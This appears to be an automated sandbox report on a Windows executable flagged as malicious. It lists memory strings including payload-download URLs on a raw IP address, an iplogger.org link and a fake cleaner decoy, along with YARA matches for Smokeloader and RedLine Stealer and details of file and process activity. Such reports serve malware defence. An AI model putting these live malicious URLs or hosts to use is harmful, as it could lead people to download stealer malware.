Source: BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/download
Source: BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/downloadLMEM
Source: BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/downloadft
Source: BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=emp
Source: BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=emppN
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download5
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download56.7
Source: BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download?
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadC5A
Source: BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadData
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadK
Source: BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadLMEM
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadU
Source: BEd2lJRXFM.exe, 00000000.00000003.2050951523.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadX
Source: BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadc
Source: BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076057799.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadft
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloado
Source: BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadwo&s=three&sub=emp
Source: BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadwo&s=three&sub=emppN
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloady
Source: BEd2lJRXFM.exe, 00000000.00000002.2663026428.00000000055D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/soft/download
Source: BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.7S
Source: BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.7_
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: BEd2lJRXFM.exe, 00000000.00000003.2409955085.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2412632116.0000000005832000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2411478136.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2415934176.0000000005849000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2414831751.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410006333.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2413734437.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410291872.0000000005850000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: BEd2lJRXFM.exe, 00000000.00000003.2409955085.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2412632116.0000000005832000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2411478136.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2415934176.0000000005849000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2414831751.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410006333.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2413734437.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410291872.0000000005850000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: https://g-cleanit.hk
Source: BEd2lJRXFM.exe, 00000000.00000003.2409955085.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2412632116.0000000005832000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2411478136.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2415934176.0000000005849000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2414831751.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410006333.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2413734437.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410291872.0000000005850000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: BEd2lJRXFM.exe	Static PE information: section name:
Source: BEd2lJRXFM.exe	Static PE information: section name: .idata
Source: BEd2lJRXFM.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D09D60		0_3_04D09D60
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D0C7DD		0_3_04D0C7DD
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D197F2		0_3_04D197F2
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D137F9		0_3_04D137F9
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D0E720		0_3_04D0E720
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D130E6		0_3_04D130E6
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D02070		0_3_04D02070
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D19912		0_3_04D19912
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D0CA0F		0_3_04D0CA0F
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00402C70		0_2_00402C70
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0040A960		0_2_0040A960
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0040F320		0_2_0040F320
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0040D3DD		0_2_0040D3DD
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0041A3F2		0_2_0041A3F2
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_004143F9		0_2_004143F9
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00413CE6		0_2_00413CE6
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0041A512		0_2_0041A512
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0040D60F		0_2_0040D60F
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_1000E184		0_2_1000E184
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_100102A0		0_2_100102A0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00A48E93		0_2_00A48E93
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_009924EC		0_2_009924EC
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0098F0E5		0_2_0098F0E5
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_008E16F0		0_2_008E16F0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00995A5B		0_2_00995A5B
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0099AA55		0_2_0099AA55
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0099907F		0_2_0099907F
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00989F85		0_2_00989F85
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_008739CC		0_2_008739CC
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0098BB12		0_2_0098BB12
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0081CB17		0_2_0081CB17
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00984D45		0_2_00984D45
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0099C575		0_2_0099C575
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00990F6D		0_2_00990F6D
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5F587		0_2_04B5F587
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B6A659		0_2_04B6A659
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5D644		0_2_04B5D644
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B6A779		0_2_04B6A779
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B63F4D		0_2_04B63F4D
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5D876		0_2_04B5D876
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5ABC7		0_2_04B5ABC7
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B53B27		0_2_04B53B27

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: String function: 04D08FA0 appears 34 times
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: String function: 04B59E07 appears 34 times
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: String function: 00409BA0 appears 35 times

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 492

Source: BEd2lJRXFM.exe, 00000000.00000003.2437926387.000000000579B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs BEd2lJRXFM.exe
Source: BEd2lJRXFM.exe, 00000000.00000003.2437723751.000000000111C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs BEd2lJRXFM.exe
Source: BEd2lJRXFM.exe, 00000000.00000003.2438017636.00000000057B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs BEd2lJRXFM.exe

Source: BEd2lJRXFM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: Y-Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: BEd2lJRXFM.exe

Static PE information: Section: teawbsxt ZLIB complexity 0.990597890378549

Source: classification engine

Classification label: mal100.evad.winEXE@2/15@0/1

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00E0A3EE CreateToolhelp32Snapshot,Module32First,

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5664

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

File created: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G

Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Command line argument: emp		0_2_00408020
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Command line argument: mixtwo		0_2_00408020

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BEd2lJRXFM.exe	Virustotal: Detection: 48%
Source: BEd2lJRXFM.exe	ReversingLabs: Detection: 50%

Source: BEd2lJRXFM.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\BEd2lJRXFM.exe "C:\Users\user\Desktop\BEd2lJRXFM.exe"
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 492

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: msimg32.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: msvcr100.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Section loaded: kernel.appcore.dll			Jump to behavior
